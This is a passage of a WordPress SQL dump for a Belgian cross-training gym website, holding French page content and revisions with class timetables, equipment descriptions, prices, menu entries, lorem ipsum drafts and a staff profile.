class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'publish', 'closed', 'open', '', 'les-seances-limelette', '', '', '2014-02-09 20:41:07', '2014-02-09 20:41:07', '', 0, 'http://www.crosstrainingcenter.be/?page_id=361', 0, 'page', '', 0),
(12, 1, '2013-05-23 18:14:43', '2013-05-23 18:14:43', '', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 18:14:43', '2013-05-23 18:14:43', '', 11, 'http://www.crosstrainingcenter.be/?p=12', 0, 'revision', '', 0),
(39, 1, '2013-06-13 16:23:30', '2013-06-13 16:23:30', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h1><b><span style=\"text-decoration: underline;\">TRX Suspension Training </span></b></h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h1><b><span style=\"text-decoration: underline;\">Kettlebel</span></b></h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h1><b><span style=\"text-decoration: underline;\">ViPR</span></b></h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h1><b><span style=\"text-decoration: underline;\">RIP TRAINER</span></b></h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-13 16:23:30', '2013-06-13 16:23:30', '', 22, 'http://www.crosstrainingcenter.be/?p=39', 0, 'revision', '', 0),
(14, 1, '2013-05-23 18:15:58', '2013-05-23 18:15:58', ' ', '', '', 'publish', 'open', 'open', '', '14', '', '', '2015-04-21 08:50:05', '2015-04-21 08:50:05', '', 0, 'http://www.crosstrainingcenter.be/?p=14', 7, 'nav_menu_item', '', 0),
(15, 1, '2013-05-23 18:15:58', '2013-05-23 18:15:58', '', 'Notre philosophie', '', 'publish', 'open', 'open', '', '15', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=15', 3, 'nav_menu_item', '', 0),
(16, 1, '2013-05-23 18:15:58', '2013-05-23 18:15:58', '', 'Accueil', '', 'publish', 'open', 'open', '', 'acceuil', '', '', '2015-04-21 08:50:04', '2015-04-21 08:50:04', '', 0, 'http://www.crosstrainingcenter.be/?p=16', 1, 'nav_menu_item', '', 0),
(17, 1, '2013-05-23 18:13:57', '2013-05-23 18:13:57', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 18:13:57', '2013-05-23 18:13:57', '', 9, 'http://www.crosstrainingcenter.be/?p=17', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(18, 1, '2013-05-23 18:14:55', '2013-05-23 18:14:55', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 18:14:55', '2013-05-23 18:14:55', '', 11, 'http://www.crosstrainingcenter.be/?p=18', 0, 'revision', '', 0),
(359, 1, '2013-10-09 21:58:57', '2013-10-09 21:58:57', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h</b>\r\nGLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nGLFE</td>\r\n<td class=\"tglfe\"><b>11h30</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>11h30</b>\r\nTRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nGLFE</td>\r\n<td class=\"ttrx\"><b>19h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-09 21:58:57', '2013-10-09 21:58:57', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(19, 1, '2013-05-23 18:12:43', '2013-05-23 18:12:43', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:12:43', '2013-05-23 18:12:43', '', 5, 'http://www.crosstrainingcenter.be/?p=19', 0, 'revision', '', 0),
(20, 1, '2013-05-24 14:33:49', '2013-05-24 14:33:49', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n        <li>Formation Personal Trainer (Parnasse)</li>\r\n	<li>Formation Les mills Coach BodyBoxe</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" 